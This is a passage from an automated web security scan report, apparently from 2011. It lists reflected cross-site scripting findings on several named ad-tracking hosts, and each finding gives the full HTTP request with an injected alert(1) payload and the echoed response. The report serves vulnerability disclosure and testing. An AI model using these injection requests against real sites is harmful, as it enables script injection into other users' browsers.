Referer: http://view.atdmt.com/CNT/iview/286444146/direct;wi.300;hi.250/01?click=http%3A%2F%2Ft.invitemedia.com%2Ftrack_click%3FauctionID%3D13052070721588565-93912%26campID%3D90206%26crID%3D93912%26pubICode%3D2083508%26pub%3D369335%26partnerID%3D38%26redirectURL%3D
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 13:33:19 GMT
Server: Apache/2.2.14 (Ubuntu)
P3P: policyref="http://choices.truste.com/w3c/p3p.xml", CP="NON DSP COR NID CURa ADMo DEVo TAIo PSAo PSDo OUR DELo BUS IND UNI PUR COM NAV INT DEM"
Cache-Control: private, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Content-Type: text/javascript
Content-Length: 3980

if (typeof truste == "undefined" || !truste) {
   var truste= {};
   truste.ca= {};
   truste.ca.listeners = {};
   truste.img = new Image(1,1);
   truste.defjsload = false;

   truste.ca.txl = {
       'object' : [{'
...[SNIP]...
</div>\
';

   var te_clr1_att02cont1_bi = {'baseName':'te-clr1-att02cont1','anchName':'te-clr1-att02cont1-anch','width':300,'height':250,'ox':201e2fc<script>alert(1)</script>485c4866fa1,'oy':0,'plc':'tr','iplc':'ctr','intDivName':'te-clr1-att02cont1-itl','iconSpanId':'te-clr1-att02cont1-icon','backgroundColor':'white','opacity':.8,'filterOpacity':80,'containerId':'att02cont1','notice
...[SNIP]...

2.91. http://choices.truste.com/ca [plc parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://choices.truste.com
Path:   /ca

Issue detail

The value of the plc request parameter is copied into the HTML document as plain text between tags. The payload 3dfbb<script>alert(1)</script>3f1c606171d was submitted in the plc parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /ca?pid=mec01&aid=att02&cid=0311wl300x250&c=att02cont1&w=300&h=250&ox=20&zi=10002&plc=tr3dfbb<script>alert(1)</script>3f1c606171d&iplc=ctr HTTP/1.1
Host: choices.truste.com
Proxy-Connection: keep-alive
Referer: http://view.atdmt.com/CNT/iview/286444146/direct;wi.300;hi.250/01?click=http%3A%2F%2Ft.invitemedia.com%2Ftrack_click%3FauctionID%3D13052070721588565-93912%26campID%3D90206%26crID%3D93912%26pubICode%3D2083508%26pub%3D369335%26partnerID%3D38%26redirectURL%3D
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 13:33:20 GMT
Server: Apache/2.2.14 (Ubuntu)
P3P: policyref="http://choices.truste.com/w3c/p3p.xml", CP="NON DSP COR NID CURa ADMo DEVo TAIo PSAo PSDo OUR DELo BUS IND UNI PUR COM NAV INT DEM"
Cache-Control: private, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Content-Type: text/javascript
Content-Length: 3980

if (typeof truste == "undefined" || !truste) {
   var truste= {};
   truste.ca= {};
   truste.ca.listeners = {};
   truste.img = new Image(1,1);
   truste.defjsload = false;

   truste.ca.txl = {
       'object' : [{'
...[SNIP]...
</div>\
';

   var te_clr1_att02cont1_bi = {'baseName':'te-clr1-att02cont1','anchName':'te-clr1-att02cont1-anch','width':300,'height':250,'ox':20,'oy':0,'plc':'tr3dfbb<script>alert(1)</script>3f1c606171d','iplc':'ctr','intDivName':'te-clr1-att02cont1-itl','iconSpanId':'te-clr1-att02cont1-icon','backgroundColor':'white','opacity':.8,'filterOpacity':80,'containerId':'att02cont1','noticeBaseUrl':'http://
...[SNIP]...

2.92. http://choices.truste.com/ca [w parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://choices.truste.com
Path:   /ca

Issue detail

The value of the w request parameter is copied into the HTML document as plain text between tags. The payload 5c2d2<script>alert(1)</script>33523cd489b was submitted in the w parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /ca?pid=mec01&aid=att02&cid=0311wl300x250&c=att02cont1&w=3005c2d2<script>alert(1)</script>33523cd489b&h=250&ox=20&zi=10002&plc=tr&iplc=ctr HTTP/1.1
Host: choices.truste.com
Proxy-Connection: keep-alive
Referer: http://view.atdmt.com/CNT/iview/286444146/direct;wi.300;hi.250/01?click=http%3A%2F%2Ft.invitemedia.com%2Ftrack_click%3FauctionID%3D13052070721588565-93912%26campID%3D90206%26crID%3D93912%26pubICode%3D2083508%26pub%3D369335%26partnerID%3D38%26redirectURL%3D
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 13:33:19 GMT
Server: Apache/2.2.14 (Ubuntu)
P3P: policyref="http://choices.truste.com/w3c/p3p.xml", CP="NON DSP COR NID CURa ADMo DEVo TAIo PSAo PSDo OUR DELo BUS IND UNI PUR COM NAV INT DEM"
Cache-Control: private, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Content-Type: text/javascript
Content-Length: 4122

if (typeof truste == "undefined" || !truste) {
   var truste= {};
   truste.ca= {};
   truste.ca.listeners = {};
   truste.img = new Image(1,1);
   truste.defjsload = false;

   truste.ca.txl = {
       'object' : [{'
...[SNIP]...
</div> \
\
';

   var te_clr1_att02cont1_bi = {'baseName':'te-clr1-att02cont1','anchName':'te-clr1-att02cont1-anch','width':3005c2d2<script>alert(1)</script>33523cd489b,'height':250,'ox':20,'oy':0,'plc':'tr','iplc':'ctr','intDivName':'te-clr1-att02cont1-itl','iconSpanId':'te-clr1-att02cont1-icon','backgroundColor':'white','opacity':.8,'filterOpacity':80,'containerId'
...[SNIP]...

2.93. http://choices.truste.com/ca [zi parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://choices.truste.com
Path:   /ca

Issue detail

The value of the zi request parameter is copied into the HTML document as plain text between tags. The payload 5710e<script>alert(1)</script>ce869b4fe74 was submitted in the zi parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /ca?pid=mec01&aid=att02&cid=0311wl300x250&c=att02cont1&w=300&h=250&ox=20&zi=100025710e<script>alert(1)</script>ce869b4fe74&plc=tr&iplc=ctr HTTP/1.1
Host: choices.truste.com
Proxy-Connection: keep-alive
Referer: http://view.atdmt.com/CNT/iview/286444146/direct;wi.300;hi.250/01?click=http%3A%2F%2Ft.invitemedia.com%2Ftrack_click%3FauctionID%3D13052070721588565-93912%26campID%3D90206%26crID%3D93912%26pubICode%3D2083508%26pub%3D369335%26partnerID%3D38%26redirectURL%3D
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 13:33:19 GMT
Server: Apache/2.2.14 (Ubuntu)
P3P: policyref="http://choices.truste.com/w3c/p3p.xml", CP="NON DSP COR NID CURa ADMo DEVo TAIo PSAo PSDo OUR DELo BUS IND UNI PUR COM NAV INT DEM"
Cache-Control: private, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Content-Type: text/javascript
Content-Length: 3980

if (typeof truste == "undefined" || !truste) {
   var truste= {};
   truste.ca= {};
   truste.ca.listeners = {};
   truste.img = new Image(1,1);
   truste.defjsload = false;

   truste.ca.txl = {
       'object' : [{'
...[SNIP]...
overlay(te_clr1_att02cont1_bi)','icon':'http://choices.truste.com/assets/admarker.png','icon_cam':'http://choices.truste.com/assets/adicon.png','iconText':'','aid':'att02','pid':'mec01','zindex':'100025710e<script>alert(1)</script>ce869b4fe74','cam':'2'};

   var tecabaseurl = 'choices.truste.com';

   truste.ca.addEvent(window, 'load', function() {
       if(!truste.defjsload) {
           var element = document.createElement('script');
           element.src = '
...[SNIP]...

2.94. http://cm.npc-scripps.overture.com/js_1_0/ [css_url parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://cm.npc-scripps.overture.com
Path:   /js_1_0/

Issue detail

The value of the css_url request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b8330"><script>alert(1)</script>c20de1645a8 was submitted in the css_url parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /js_1_0/?config=7894763060&type=entertainment&ctxtId=entertainment&keywordCharEnc=utf8&source=npc_scripps_courierpress_t1_ctxt&adwd=728&adht=90&ctxtUrl=http%3A%2F%2Fwww.courierpress.com%2Fnews%2F2011%2Fmay%2F12%2Fheder-here-in-this-spp-ppppp%2F&css_url=http://media.scrippsnewspapers.com/yahoo/yahoo_cm.cssb8330"><script>alert(1)</script>c20de1645a8&du=1&cb=1305207046691&ctxtContent=%3C!--%0A%20%20%0A%20%20%20%20%0A%20%20%20%20ROLE%20%3D%20prod.%0A--%3E%3Chead%3E%0A%09%0A%09%09%0A%09%09%3Cscript%20type%3D%22text%2Fjavascript%22%3E%0A%09%09%09var%20jSINGconf%20%3D%20%7B%7D%3B%0A%09%09%09jSINGconf.theme%20%3D%20%7B%0A%09%09%09%09%0A%09%09%09%09%09CITY%3A%20'Evansville'%2C%0A%09%09%09%09%0A%09%09%09%09%09SITE_NAME%3A%20'Evansville%20Courier%20%26%20Press'%2C%0A%09%09%09%09%0A%09%09%09%09%09VIDEO_MEDIA_URL%3A%20'http%3A%2F%2Fmedia.scrippsnewspapers.com%2Fcorp_assets%2Fasphalt'%2C%0A%09%09%09%09%0A%09%09%09%09%09SITE_MEDIA_URL%3A%20'http%3A%2F%2Fweb.courierpress.com%2Fstatic%2Fecp%2Fasphalt%2Fprod'%2C%0A%09%09%09%09%0A%09%09%09%09%09REGION%3A%20'Evansville'%2C%0A%09%09%09%09%0A%09%09%09%09%09MOBILE_SITE_NAME%3A%20'Evansville%20Courier%20%26%20Press%20Mobile'%2C%0A%09%09%09%09%0A%09%09%09%09%09SITE_URL%3A%20'http%3A%2F%2Fwww HTTP/1.1
Host: cm.npc-scripps.overture.com
Proxy-Connection: keep-alive
Referer: http://www.courierpress.com/news/2011/may/12/heder-here-in-this-spp-ppppp/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BX=76of9et6r747t&b=3&s=m1; UserData=02u3hs9yoaLQsFTjBpdnM0tDCyNTUycXAzcLJTNk%2bLSi4sTU1JNbEBACNDFzcLUwNnC2MAc2BU%2bQw=

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 13:32:10 GMT
P3P: policyref="http://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV"
Set-Cookie: UserData=02u3hs9yoaLQsFTjBpdnM0tDCyNTUycXAzcLJTNk%2bLSi4sTU1JNbEBACNDVzczExMLS3MAN0tUBA0=; Domain=.overture.com; Path=/; Max-Age=315360000; Expires=Sun, 09-May-2021 13:32:10 GMT
Cache-Control: no-cache, private
Pragma: no-cache
Expires: 0
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 4470


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>

<head>
<base target="_top">
<meta http-equiv="Content-Type" content="text/html; charset=
...[SNIP]...
<link rel="stylesheet" href="http://media.scrippsnewspapers.com/yahoo/yahoo_cm.cssb8330"><script>alert(1)</script>c20de1645a8" type="text/css">
...[SNIP]...

2.95. http://guidepolls.about.com/urbanlegends/8140502316/poll.js [linkback parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://guidepolls.about.com
Path:   /urbanlegends/8140502316/poll.js

Issue detail

The value of the linkback request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 6e7d1'%3balert(1)//b1ec805f36c was submitted in the linkback parameter. This input was echoed as 6e7d1';alert(1)//b1ec805f36c in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /urbanlegends/8140502316/poll.js?linkback=http://urbanlegends.about.com/b/2011/05/10/poll-superstitious-about-friday-the-13th.htm6e7d1'%3balert(1)//b1ec805f36c HTTP/1.1
Host: guidepolls.about.com
Proxy-Connection: keep-alive
Referer: http://urbanlegends.about.com/b/2011/05/10/poll-superstitious-about-friday-the-13th.htm
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TMog=B5312m3f20kA052n; zFD=B5310B50110B00101; jsc=13; Mint=B5CDUi2520kA1h03; zBT=1

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 13:32:24 GMT
Server: Apache/1.3.37 (Unix) mod_perl/1.25_01 ARM/06TD.34
PRAGMA: no-cache
Cache-Control: max-age=-3600
Expires: Thu, 12 May 2011 12:32:24 GMT
Content-Type: application/x-javascript
Content-Length: 907

var x = '<div class="poll"> <h4>Are you superstitious about Friday the 13th?</h4> <form method="get" action="/gi/pages/poll.htm"> <input type="hidden" name="linkback" value="http://urbanlegends.about.com/b/2011/05/10/poll-superstitious-about-friday-the-13th.htm6e7d1';alert(1)//b1ec805f36c">
...[SNIP]...

2.96. http://hits.nextstat.com/cgi-bin/wsv2.cgi [108645 parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://hits.nextstat.com
Path:   /cgi-bin/wsv2.cgi

Issue detail

The value of the 108645 request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d8db3"-alert(1)-"d35a77103d0 was submitted in the 108645 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /cgi-bin/wsv2.cgi?108645d8db3"-alert(1)-"d35a77103d0 HTTP/1.1
Host: hits.nextstat.com
Proxy-Connection: keep-alive
Referer: http://orangeorb.blogspot.com/2011/05/planets-align-on-friday-13th-and.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 13:32:27 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.1.6
Cache-Control: private
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Set-Cookie: webStat_108645d8db3"-alert(1)-"d35a77103d0=2b45ebce6d4c259189182ba86a7560e8; expires=Sun, 09-May-2021 13:32:27 GMT; path=/; domain=.nextstat.com
Set-Cookie: webStat_108645d8db3"-alert(1)-"d35a77103d0_mv=2b45ebce6d4c259189182ba86a7560e8; expires=Sun, 09-May-2021 13:32:27 GMT; path=/; domain=.nextstat.com
Content-Length: 4124
Connection: close
Content-Type: text/html; charset=UTF-8

function wf_get_rfsqv() {
var q = (WS_rfs_3p && WS_ref.indexOf('?') > 0)?WS_ref.substring(WS_ref.indexOf('?')+1):WS_rfs.location.search.substring(1),v = q.split("&");
for (var i=0;i<v.length;i++)
...[SNIP]...
}
return true;
}
function wf_rfs_get() { if (! WS_rfs) { WS_rfs = WS_w; WS_rfs = wf_rfs_main (WS_rfs); } return WS_rfs; }
function wf_evt_trk(et){var i=new Image();i.src=et;}

var WS_ac="108645d8db3"-alert(1)-"d35a77103d0";
var WS_w=window, WS_d=document, WS_rfs = 0, WS_rfs_3p = 0, WS_ref = WS_d.referrer;

var WS_aref;
var WS_pn;
var WS_pnj = "";
var WS_Cam, WS_Evt;
if (WS_pn) WS_pn = escape(WS_pn);
else if (WS_pnj) WS
...[SNIP]...

2.97. http://ib.adnxs.com/ptj [redir parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ib.adnxs.com
Path:   /ptj

Issue detail

The value of the redir request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ab71b'%3balert(1)//4d87f937d49 was submitted in the redir parameter. This input was echoed as ab71b';alert(1)//4d87f937d49 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /ptj?member=541&size=300x250&inv_code=1588565&referrer=http://www.examiner.com/fight-sports-in-national/complete-wwe-smackdown-spoilers-for-friday-may-13th-new-face-and-new-feuds&redir=http%3A%2F%2Fad.yieldmanager.com%2Fst%3Fanmember%3D541%26anprice%3D%7BPRICEBUCKET%7D%26ad_type%3Dad%26ad_size%3D300x250%26section%3D1588565ab71b'%3balert(1)//4d87f937d49 HTTP/1.1
Host: ib.adnxs.com
Proxy-Connection: keep-alive
Referer: http://adserving2.cpxinteractive.com/st?ad_type=iframe&ad_size=300x250&section=1588565
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: icu=ChIIn4MBEAoYAiACKAIwsMeq7gQKEgibiwEQChgDIAMoAzDcyKruBAoSCN--AhAKGAEgASgBMOHequ4EEOHequ4EGBQ.; anj=Kfw)(H.Ook)_c8%r9ff]S@h8KANc]mP0h#i:1kZfDLeOJ8#%:'=tMdp)hT=FiVaam_7'jPTW.C%.HxVrFU+@):Ol/][9rD6QF]:$2o$=2t6Ekuw9KB7t>8oBvD:k99t)AUvBQXpMrB.WZ5q$]?qZQ<Vu[#-5^T/x)S7Oq?h<uC6Z'cFlMBT^$(tZTqQER-Qb:5W?g#97-6xWK*4C*9Y>i-@J(yrw^Ur004(6av#+:`V.$%Pg]1DL-tn5$I':[WH#s(nOG69jVj#uUqQEFm_f3-WbrQnxP_drdf#rnuCaB*1I[+NvK[h(c^5Cfj.]G5(':2LiI%%e8#U`X)iJ[4k+(rXIJhdni<)gQjgMUOcN^MOw573KS9ffE$yoAk:>vBb/x@'DVx72K/G/TF_NOLJt[Iy>s!G$dq2Xo:NAZ$7JjL5hQ1Wl:w0(Oa@MM`A:J5wBQuG9jejGeOsVqM1%Tv8OvW0d`NSP4F`8%4q]@s=N3tj7_2rE.]F]824R1O]-r7%W#2%YUAe0vv=@J-XlNPR`5^cw-2hGuDpvfqe=s6vBS!qVDC)at^+-@uA6Zcf)LUf'Vu<UUwffAv@PD(x%bOXCT7ce=h0.JV^-rud6M/nMD2uDe+h%f9jmNXTMyW!I=tuJLUZJ#YJ4>1u!>#NuZ#?6t96[:wU5#1KSrBf*SZTK8<Ta<L772@gT_5e9PMtHS(PR0#:aQJ9n`5j; sess=1; uuid2=2724386019227846218

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Set-Cookie: sess=1; path=/; expires=Fri, 13-May-2011 13:33:12 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: uuid2=2724386019227846218; path=/; expires=Wed, 10-Aug-2011 13:33:12 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: uuid2=2724386019227846218; path=/; expires=Wed, 10-Aug-2011 13:33:12 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: icu=ChII-ooBEAoYASABKAEwmMOv7gQQmMOv7gQYAA..; path=/; expires=Wed, 10-Aug-2011 13:33:12 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: acb949612=-@L6D208WMq5cpg20/dRjHaWJ?enc=PDw8PDw8DEAAAAAAAAAIQAAAAAAAAAhAYhBYObQIEUAK16NwPQoUQIPTcXV8EH5bSsYda6b2ziWY4ctNAAAAABRWAwAdAgAA4gEAAAIAAAAPCAQAksAAAAEAAABVU0QAVVNEACwB-gAkAwAAlBABAgUCAAUAAAAA9Rdv9wAAAAA.&tt_code=1588565&udj=uf%28%27a%27%2C+12656%2C+1305207192%29%3Buf%28%27c%27%2C+60150%2C+1305207192%29%3Buf%28%27r%27%2C+264207%2C+1305207192%29%3B&cnd=!SRusDwj21QMQj5AQGAAgkoEDMAA4pAZAAEjiA1CUrA1YAGDaAWgAcAB4AIABFogB5hWQAQGYAQGgAQOoAQOwAQG5AQrXo3A9ChRAwQEK16NwPQoUQMkBMzMzMzMz9z_QAQA.&ccd=!ZARnJwj21QMQj5AQGJKBAyAA; path=/; expires=Fri, 13-May-2011 13:33:12 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: uuid2=2724386019227846218; path=/; expires=Wed, 10-Aug-2011 13:33:12 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: anj=Kfw)(Hg0)m)_Uh2u:[r@PdBuy]S=FdXg)Ov(hO!$dY(koMBFV9m*6?J@gS%S=?Gc6U#?^ITW.C%.HqtOE7nUz/H)+lj:jQe>d]P0JIz6scC@6!d^_JDL4(Eqn@KB?p+IxXVz5l@7Qi.hvK2fXWC#z.Yve]0:@BovHT9i=Y6*`[@LEqZ4a_oFLsJ<T2#7YqwU:X?m8t!O'_[X`Em/W+C?b_[^-Hx_81HGl6h7e_55C!4`6(QHuL*7*hlVs@B8ctXnwcD41w%TF7tcaN'7gZRdos7`wWAw9W-/ha4br%YE`t(l[/BJwTSaS-Nc$C/A^$uCbte)*hR*amnJS-cCjw3iTW/B=7Q2<r31W:r>.KSS4M$.yv.GqtpO[l>P]h*gT8<W#j9g0LMgA6.-4#4od>anYU0Wc@oKg0/KerE_.4wFT5'v'CW/OPy(fr>m7SgdTLkIyRODhZB3z%P+OOlsW7dd*7qUVrjq-92umvYr#K3b?)VOKosPd+%D)jULIwnE@[^9b3Cl()!Qw4.XR-[318NFl+`e[!Ky_NNk5-hr9S^JfE-gj1.#r!>v/lWxG'1N+lNL5nZyr!ks@v2c(!cJBEI>62Gw1*pL.k/6UF4vEX.85uk2hUy7c/Jq<`Lk(BKmr99HS5dP1q_rJ7n?ZTTpx%5Xu^KG7qKbG[w'F@'iqnKm0B!8R)Z]LhY<SIqwwOVGrk[Yo; path=/; expires=Wed, 10-Aug-2011 13:33:12 GMT; domain=.adnxs.com; HttpOnly
Content-Type: text/javascript
Date: Thu, 12 May 2011 13:33:12 GMT
Content-Length: 296

document.write('<scr'+'ipt type="text/javascript"src="http://ad.yieldmanager.com/st?anmember=541&anprice=300&ad_type=ad&ad_size=300x250&section=1588565ab71b';alert(1)//4d87f937d49"></scr'+'ipt>');docu
...[SNIP]...

2.98. http://image3.pubmatic.com/AdServer/UPug [pageURL parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://image3.pubmatic.com
Path:   /AdServer/UPug

Issue detail

The value of the pageURL request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 2e56f'-alert(1)-'49e155643b was submitted in the pageURL parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /AdServer/UPug?operId=2&pubId=398&pixId=6&ran=0.19279520929519856&pageURL=http://www.pubmatic.com/2e56f'-alert(1)-'49e155643b HTTP/1.1
Host: image3.pubmatic.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.pubmatic.com/
Cookie: KRTBCOOKIE_22=488-pcv:1|uid:3658195966029417970; PUBRETARGET=82_1399045295.806_1336140548; KRTBCOOKIE_148=1699-uid:E3F32BD09546C94DAD95D1B540110C

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 13:34:18 GMT
Server: Apache/2.2.4 (Unix) DAV/2 mod_fastcgi/2.4.2
Set-Cookie: KADUSERCOOKIE=0927D9EA-1CD0-46F5-B72D-6FC4476FCBD6; domain=pubmatic.com; expires=Fri, 11-May-2012 13:34:18 GMT; path=/
Vary: Accept-Encoding
P3P: CP="NOI DSP COR LAW CUR ADMo DEVo TAIo PSAo PSDo IVAo IVDo HISo OTPo OUR SAMo BUS UNI COM NAV INT DEM CNT STA PRE LOC"
Connection: close
Content-Type: text/html
Content-Length: 500

document.write('<script type="text/javascript" src="http://ads.pubmatic.com/UniversalPixel/398/6/pixel.js"></script>');
document.write('<iframe name="pbeacon" frameborder="0" allowtransparency="true"
...[SNIP]...
olling="no" width="0" height="0" style="position:absolute;top:-20000px;" src="http://ptrack.pubmatic.com/AdServer/PugTracker?pixId=6&pubId=398&ran=0.19279520929519856&pageURL=http://www.pubmatic.com/2e56f'-alert(1)-'49e155643b">
...[SNIP]...

2.99. http://image3.pubmatic.com/AdServer/UPug [ran parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://image3.pubmatic.com
Path:   /AdServer/UPug

Issue detail

The value of the ran request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 33c57'-alert(1)-'f87ac0b58b4 was submitted in the ran parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /AdServer/UPug?operId=2&pubId=398&pixId=6&ran=0.1927952092951985633c57'-alert(1)-'f87ac0b58b4&pageURL=http://www.pubmatic.com/ HTTP/1.1
Host: image3.pubmatic.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.pubmatic.com/
Cookie: KRTBCOOKIE_22=488-pcv:1|uid:3658195966029417970; PUBRETARGET=82_1399045295.806_1336140548; KRTBCOOKIE_148=1699-uid:E3F32BD09546C94DAD95D1B540110C

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 13:34:18 GMT
Server: Apache/2.2.4 (Unix) DAV/2 mod_fastcgi/2.4.2
Set-Cookie: KADUSERCOOKIE=7AFF6AED-C8A2-4BD1-85B4-05A0945C43F9; domain=pubmatic.com; expires=Fri, 11-May-2012 13:34:18 GMT; path=/
Vary: Accept-Encoding
P3P: CP="NOI DSP COR LAW CUR ADMo DEVo TAIo PSAo PSDo IVAo IVDo HISo OTPo OUR SAMo BUS UNI COM NAV INT DEM CNT STA PRE LOC"
Connection: close
Content-Type: text/html
Content-Length: 501

document.write('<script type="text/javascript" src="http://ads.pubmatic.com/UniversalPixel/398/6/pixel.js"></script>');
document.write('<iframe name="pbeacon" frameborder="0" allowtransparency="true"
...[SNIP]...
